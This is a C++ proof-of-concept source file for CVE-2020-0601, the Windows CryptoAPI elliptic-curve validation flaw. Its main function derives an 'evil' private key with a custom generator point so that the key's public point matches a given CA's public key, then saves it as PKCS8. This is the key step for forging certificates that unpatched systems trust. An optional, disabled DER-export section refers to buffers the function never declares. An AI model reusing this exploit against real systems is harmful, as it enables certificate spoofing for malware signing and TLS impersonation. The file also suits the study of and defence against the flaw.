#include "cve-2020-0601_poc.h"

#include <string>

#include <cryptopp/sha.h>
#include <cryptopp/eccrypto.h>
#include <cryptopp/nbtheory.h>
#include <cryptopp/osrng.h>
#include <cryptopp/oids.h>
#include <cryptopp/files.h>
#include <cryptopp/filters.h>
using CryptoPP::SHA1;
using CryptoPP::SHA256;
using CryptoPP::SHA384;
using CryptoPP::ECDSA;
using CryptoPP::ECP;
using CryptoPP::DL_Keys_ECDSA;
using CryptoPP::StringSource;
using CryptoPP::DL_GroupParameters_EC;
using CryptoPP::DL_PrivateKey_EC;
using CryptoPP::DERSequenceEncoder;
using CryptoPP::DEREncodeUnsigned;
using CryptoPP::DERGeneralEncoder;
using CryptoPP::BufferedTransformation;

//#define SUPPORT_DER_ENCODING 1

#ifdef SUPPORT_DER_ENCODING
// Adapted from https://github.com/noloader/cryptopp-pem/blob/master/pem_write.cpp

// RAII guard for the EncodeAsOID setting of a set of EC group parameters.
// The constructor records the current setting, and the specialization for
// DL_GroupParameters_EC<ECP> then forces it to true. The destructor restores
// the recorded value. Upstream (cryptopp-pem) forces named-curve OID encoding
// for OpenSSL compatibility. See
// https://wiki.openssl.org/index.php/Elliptic_Curve_Cryptography#Named_Curves
// Only the DL_GroupParameters_EC<ECP> constructor/destructor are defined in
// this file.
// NOTE(review): the guarded object is held by const reference and modified
// through const_cast, so it must not be a genuinely const object.
template <class T>
struct OID_State
{
    // explicit: a guard should never be created by an implicit conversion.
    explicit OID_State(const T& obj);
    virtual ~OID_State();

    const T& m_gp;   // parameters whose EncodeAsOID flag is overridden
    bool m_flag;     // EncodeAsOID value captured at construction, restored on destruction

private:
    // Non-copyable: each guard must restore the flag exactly once.
    OID_State(const OID_State&);
    OID_State& operator=(const OID_State&);
};

// Prime-field EC specialization: remember the current EncodeAsOID value, then
// switch it on for as long as this guard lives.
template <>
OID_State<DL_GroupParameters_EC<ECP> >::OID_State(const DL_GroupParameters_EC<ECP>& gp)
    : m_gp(gp),
      m_flag(gp.GetEncodeAsOID())
{
    // m_gp is a const reference; the flag is still toggled on the referenced object.
    const_cast<DL_GroupParameters_EC<ECP>&>(m_gp).SetEncodeAsOID(true);
}

// Prime-field EC specialization: put back the EncodeAsOID value that was in
// effect when the guard was constructed.
template <>
OID_State<DL_GroupParameters_EC<ECP> >::~OID_State()
{
    const_cast<DL_GroupParameters_EC<ECP>&>(m_gp).SetEncodeAsOID(m_flag);
}

// Writes the EC private key `key` to `bt` as a DER SEQUENCE of:
//   version (1),
//   private exponent x as an OCTET STRING sized to the subgroup order's byte count,
//   [0] constructed: a hand-built parameters SEQUENCE of
//       { 1, curve (field + a,b), base point, group order, 1 }.
// Ends with bt.MessageEnd().
// NOTE(review): y, M, A, B and G below are computed but never used, and `oid`
// is looked up (or faked) but never written to the output. They look like
// leftovers from the upstream cryptopp-pem code.
template <class EC>
void savePrivKey(const DL_PrivateKey_EC<EC>& key, BufferedTransformation& bt)
{

    // Crypto++ provides {version,x}, while OpenSSL expects {version,x,curve oid,y}.
    // NOTE(review): the encoder below does not follow that layout. It emits explicit
    // curve parameters under [0], and no public key y.
    typedef typename DL_PrivateKey_EC<EC>::Element Element;
    const DL_GroupParameters_EC<EC>& params = key.GetGroupParameters();
    const CryptoPP::Integer& x = key.GetPrivateExponent();
    const Element& y = params.ExponentiateBase(x);

    CryptoPP::Integer M = params.GetCurve().GetField().GetModulus();
    CryptoPP::Integer A = params.GetCurve().GetA();
    CryptoPP::Integer B = params.GetCurve().GetB();
    const Element G = params.GetSubgroupGenerator();

    // Named curve: validNamedCurve is false when no group OID can be retrieved.
    CryptoPP::OID oid;
    bool validNamedCurve = key.GetVoidValue(CryptoPP::Name::GroupOID(), typeid(oid), &oid);
    //if (key.GetVoidValue(CryptoPP::Name::GroupOID(), typeid(oid), &oid) == false)
    //    throw CryptoPP::Exception(CryptoPP::Exception::OTHER_ERROR, "PEM_DEREncode: failed to retrieve curve OID");
    // The private key may use a custom curve/generator that matches none of the
    // known OIDs, so the upstream check commented out above would throw.
    // Instead, a fake OID is substituted. Most tools cannot parse a key carrying
    // it, but it still works. A real, known OID would make tools validate the
    // parameters against that curve, and the validation would fail.
    // NOTE(review): `oid` is not referenced by the encoder below, so this branch
    // currently has no effect on the output.
    if (!validNamedCurve) {
        oid += 1; oid += 2; oid += 3; oid += 4; oid += 5;
        //oid = CryptoPP::ASN1::secp384r1();
    }

    DERSequenceEncoder seq1(bt);
        DEREncodeUnsigned<CryptoPP::word32>(seq1, 1);  // version
        // private exponent, padded to the byte length of the subgroup order
        x.DEREncodeAsOctetString(seq1, params.GetSubgroupOrder().ByteCount());

        // [0]: explicit parameters written field by field instead of params.DEREncode()
        DERGeneralEncoder cs1(seq1, CryptoPP::CONTEXT_SPECIFIC | CryptoPP::CONSTRUCTED | 0);
            //params.DEREncode(cs1);
            DERSequenceEncoder seq2(cs1);
                // parameters version
                DEREncodeUnsigned<CryptoPP::word32>(seq2, 1);
                params.GetCurve().DEREncode(seq2);
                // base point; the `false` argument presumably selects the uncompressed form
                params.GetCurve().DEREncodePoint(seq2, params.GetSubgroupGenerator(), false);
                // NOTE(review): the ECParameters `order` field is the base-point order.
                // GetGroupOrder() may differ from GetSubgroupOrder() when the cofactor
                // is not 1. Verify against the Crypto++ docs.
                params.GetGroupOrder().DEREncode(seq2);
                // NOTE(review): cofactor hard-coded to 1; params.GetCofactor() would be
                // correct for curves with a cofactor other than 1.
                DEREncodeUnsigned<CryptoPP::word32>(seq2, 1);
            seq2.MessageEnd();
        cs1.MessageEnd();
    seq1.MessageEnd();
    bt.MessageEnd();
}

void privKeyToDer(const DL_PrivateKey_EC<ECP>& ec, BufferedTransformation& bt)
{
    OID_State<DL_GroupParameters_EC<ECP> > state(ec.GetGroupParameters());
    savePrivKey(ec, bt);
}

void privKeyToDer(const DL_Keys_ECDSA<ECP>::PrivateKey& ecdsa, BufferedTransformation& bt)
{
    privKeyToDer(dynamic_cast<const DL_PrivateKey_EC<ECP>&>(ecdsa), bt);
}
#endif

bool craftEvilPrivKey(const char *caPubKeyRaw, size_t caPubKeyRawLen,
                      char *outEvilPrivKeyPKCS8, size_t maxSizePKCS8, size_t *outEvilPrivKeyPKCS8Len,
                      bool doSave, const char *evilPrivKeyFileName)
{
    // load public key of the provided certificate into native CryptoPP type
    DL_Keys_ECDSA<ECP>::PublicKey caPubKey;
    caPubKey.Load(CryptoPP::ArraySource((const unsigned char *)caPubKeyRaw,
                                         caPubKeyRawLen, true).Ref());

    // generate a private key using the same curve as in the provided CA certificate
    CryptoPP::AutoSeededRandomPool prng;
    DL_Keys_ECDSA<ECP>::PrivateKey privKeyBase;
    privKeyBase.Initialize(prng, caPubKey.GetGroupParameters());

    // get the private key elliptic curve parameters
    CryptoPP::Integer privKeyBaseExp = privKeyBase.GetPrivateExponent();
    ECP privKeyBaseCurve = privKeyBase.GetGroupParameters().GetCurve();
    CryptoPP::Integer privKeyBaseOrder = privKeyBase.GetGroupParameters().GetSubgroupOrder();

    // calculate an inverse value of the private key
    CryptoPP::Integer privKeyInverse = CryptoPP::EuclideanMultiplicativeInverse(privKeyBaseExp, privKeyBaseOrder);
    // produce our custom generator (base point) as a multiplication of the inverse value of our private key
    // and the public key of the provided CA certificate
    ECP::Point caPubKeyQ = caPubKey.GetPublicElement();
    ECP::Point evilG = privKeyBaseCurve.ScalarMultiply(caPubKeyQ, privKeyInverse);

    // create an "evil" private key object using the base private's key exponent and curve but
    // with our "evil" generator (base point)
    DL_Keys_ECDSA<ECP>::PrivateKey evilPrivKey;
    evilPrivKey.Initialize(privKeyBaseCurve, evilG, privKeyBaseOrder, privKeyBaseExp);

    // convert evil private key into PKCS8 format
    CryptoPP::ArraySink evilPrivKeyPKCS8As((unsigned char *)outEvilPrivKeyPKCS8, maxSizePKCS8);
    evilPrivKey.Save(evilPrivKeyPKCS8As.Ref());
    *outEvilPrivKeyPKCS8Len = evilPrivKeyPKCS8As.TotalPutLength();

    if (doSave) {
        // save it as-is so this can be imported by some tools
        evilPrivKey.Save(CryptoPP::FileSink(evilPrivKeyFileName).Ref());
    }

    // the code below converts the key to DER format
    // however, as we have here our custom curve (not the "named" one), most of the
    // tools are not able to properly import it. thus, leaving this code commented-out
#ifdef SUPPORT_DER_ENCODING
    CryptoPP::ArraySink evilPrivKeyDerAs((CryptoPP::byte *)outEvilPrivKeyDer, maxSizeDer);
    privKeyToDer(evilPrivKey, evilPrivKeyDerAs.Ref());
    *outEvilPrivKeyDerLen = evilPrivKeyDerAs.TotalPutLength();
#endif

    return true;
}
